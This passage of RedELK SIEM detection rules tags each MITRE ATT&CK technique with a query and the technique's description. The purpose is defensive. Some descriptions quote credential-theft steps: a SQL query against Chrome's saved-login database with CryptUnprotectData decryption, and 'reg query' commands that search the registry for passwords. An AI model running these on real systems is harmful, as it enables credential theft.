malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. [1] The certificates used during an operation may be created, acquired, or stolen by the adversary. [2] [3] Unlike Invalid Code Signature, this activity will result in a valid signature.\nCode signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. [1]\nCode signing certificates may be used to bypass security policies that require signed code to execute on a system.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1116","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1116] Code Signing","query":"threat.technique.id: T1116","references":["https://attack.mitre.org/techniques/T1116","https://attack.mitre.org/techniques/T1553/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1116","name":"Code Signing","id":"T1116"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Commonly Used Port","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1043","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1043] Commonly Used Port","query":"threat.technique.id: T1043","references":["https://attack.mitre.org/techniques/T1043","https://attack.mitre.org/techniques/T1571"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1043","name":"Commonly Used Port","id":"T1043"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1092","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1092] Communication Through Removable Media","query":"threat.technique.id: T1092","references":["https://attack.mitre.org/techniques/T1092"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1092","name":"Communication Through Removable Media","id":"T1092"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.[1]\nSource code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing. Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.[2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1500","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1500] Compile After Delivery","query":"threat.technique.id: T1500","references":["https://attack.mitre.org/techniques/T1500","https://attack.mitre.org/techniques/T1027/004"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1500","name":"Compile After Delivery","id":"T1500"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such VBA, JScript, Java, and ActiveX. [1] CHM content is displayed using underlying components of the Internet Explorer browser [2] loaded by the HTML Help executable program (hh.exe). [3]\nA custom CHM file containing embedded payloads could be delivered to a victim then triggered by User Execution. CHM execution may also bypass application application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. [4] [5]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1223","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1223] Compiled HTML File","query":"threat.technique.id: T1223","references":["https://attack.mitre.org/techniques/T1223","https://attack.mitre.org/techniques/T1218/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1223","name":"Compiled HTML File","id":"T1223"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1223","name":"Compiled HTML File","id":"T1223"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to System Firmware but conducted upon other system components/devices that may not have the same capability or level of integrity checking.\nMalicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1109","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1109] Component Firmware","query":"threat.technique.id: T1109","references":["https://attack.mitre.org/techniques/T1109","https://attack.mitre.org/techniques/T1542/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1109","name":"Component Firmware","id":"T1109"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1109","name":"Component Firmware","id":"T1109"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Component Object Model and Distributed COM","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1175","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1175] Component Object Model and Distributed COM","query":"threat.technique.id: T1175","references":["https://attack.mitre.org/techniques/T1175","https://attack.mitre.org/techniques/T1021"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1175","name":"Component Object Model and Distributed COM","id":"T1175"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1175","name":"Component Object Model and Distributed COM","id":"T1175"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.[1] References to various COM objects are stored in the Registry.\nAdversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[2] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1122","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1122] Component Object Model Hijacking","query":"threat.technique.id: T1122","references":["https://attack.mitre.org/techniques/T1122","https://attack.mitre.org/techniques/T1546/015"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1122","name":"Component Object Model Hijacking","id":"T1122"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1122","name":"Component Object Model Hijacking","id":"T1122"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. [1] Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.\nAdversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1090","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1090] Connection Proxy","query":"threat.technique.id: T1090","references":["https://attack.mitre.org/techniques/T1090"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1090","name":"Connection Proxy","id":"T1090"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1090","name":"Connection Proxy","id":"T1090"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.\nAccounts may be created on the local system or within a domain or cloud tenant. In cloud environments, adversaries may create accounts that only have access to specific services, which can reduce the chance of detection.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1136","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1136] Create Account","query":"threat.technique.id: T1136","references":["https://attack.mitre.org/techniques/T1136"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1136","name":"Create Account","id":"T1136"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. [1] [2] Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. [1] [2] [3]\nFor ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. [1]\nMalicious Control Panel items can be delivered via Phishing campaigns [2] [3] or executed as part of multi-stage malware. [4] Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1196","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1196] Control Panel Items","query":"threat.technique.id: T1196","references":["https://attack.mitre.org/techniques/T1196","https://attack.mitre.org/techniques/T1218/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1196","name":"Control Panel Items","id":"T1196"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1196","name":"Control Panel Items","id":"T1196"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.\nSeveral of the tools mentioned in associated sub-techniques may be used by both adversaries and professional security testers. Additional custom tools likely exist as well.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1003","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1003] Credential Dumping","query":"threat.technique.id: T1003","references":["https://attack.mitre.org/techniques/T1003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1003","name":"Credential Dumping","id":"T1003"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may acquire credentials from web browsers by reading files specific to the target browser.[1] Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. [2]\nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. [3][4]\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.[5]\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1503","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1503] Credentials from Web Browsers","query":"threat.technique.id: T1503","references":["https://attack.mitre.org/techniques/T1503","https://attack.mitre.org/techniques/T1555/003"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1503","name":"Credentials from Web Browsers","id":"T1503"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.\nIt is possible to extract passwords from backups or saved virtual machines through OS Credential Dumping. [1] Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. [2]\nIn cloud environments, authenticated user credentials are often stored in local configuration and credential files. In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files. [3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1081","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1081] Credentials in Files","query":"threat.technique.id: T1081","references":["https://attack.mitre.org/techniques/T1081","https://attack.mitre.org/techniques/T1552/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1081","name":"Credentials in Files","id":"T1081"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.\nExample commands to find Registry keys related to password information: [1]\nLocal Machine Hive: reg query HKLM /f password /t REG_SZ /s\nCurrent User Hive: reg query HKCU /f password /t REG_SZ /s","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1214","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1214] Credentials in Registry","query":"threat.technique.id: T1214","references":["https://attack.mitre.org/techniques/T1214","https://attack.mitre.org/techniques/T1552/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1214","name":"Credentials in Registry","id":"T1214"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.[1] Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).\nICMP communication between hosts is one example. Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts; [2] however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1094","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1094] Custom Command and Control Protocol","query":"threat.technique.id: T1094","references":["https://attack.mitre.org/techniques/T1094","https://attack.mitre.org/techniques/T1095"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1094","name":"Custom Command and Control Protocol","id":"T1094"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1024","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1024] Custom Cryptographic Protocol","query":"threat.technique.id: T1024","references":["https://attack.mitre.org/techniques/T1024","https://attack.mitre.org/techniques/T1573"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1024","name":"Custom Cryptographic Protocol","id":"T1024"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0011","name":"Command and Control","id":"TA0011"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. [1] Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. [2]\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). [1] The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. [1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1207","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1207] DCShadow","query":"threat.technique.id: T1207","references":["https://attack.mitre.org/techniques/T1207"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1207","name":"DCShadow","id":"T1207"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. [1] Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.\nThere are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, [2] by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. [3]\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL. [4] [5] [6]\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1038","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1038] DLL Search Order Hijacking","query":"threat.technique.id: T1038","references":["https://attack.mitre.org/techniques/T1038","https://attack.mitre.org/techniques/T1574/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1038","name":"DLL Search Order Hijacking","id":"T1038"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.\nPrograms may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests [1] are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. [2]\nAdversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1073","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1073] DLL Side-Loading","query":"threat.technique.id: T1073","references":["https://attack.mitre.org/techniques/T1073","https://attack.mitre.org/techniques/T1574/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1073","name":"DLL Side-Loading","id":"T1073"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.[1][2][3][4][5][6] Common operating system file deletion commands such as del and rm often only remove pointers to files without wiping the contents of the files themselves, making the files recoverable by proper forensic methodology. This behavior is distinct from Disk Content Wipe and Disk Structure Wipe because individual files are destroyed rather than sections of a storage disk or the disk's logical structure.\nAdversaries may attempt to overwrite files and directories with randomly generated data to make it irrecoverable.[4][5] In some cases politically oriented image files have been used to overwrite data.[2][3][4]\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware designed for destroying data may have worm-like features to propagate across a network by leveraging additional techniques like Valid Accounts, OS Credential Dumping, and SMB/Windows Admin Shares.[1][2][3][4][6]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1485","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1485] Data Destruction","query":"threat.technique.id: T1485","references":["https://attack.mitre.org/techniques/T1485"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1485","name":"Data Destruction","id":"T1485"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom 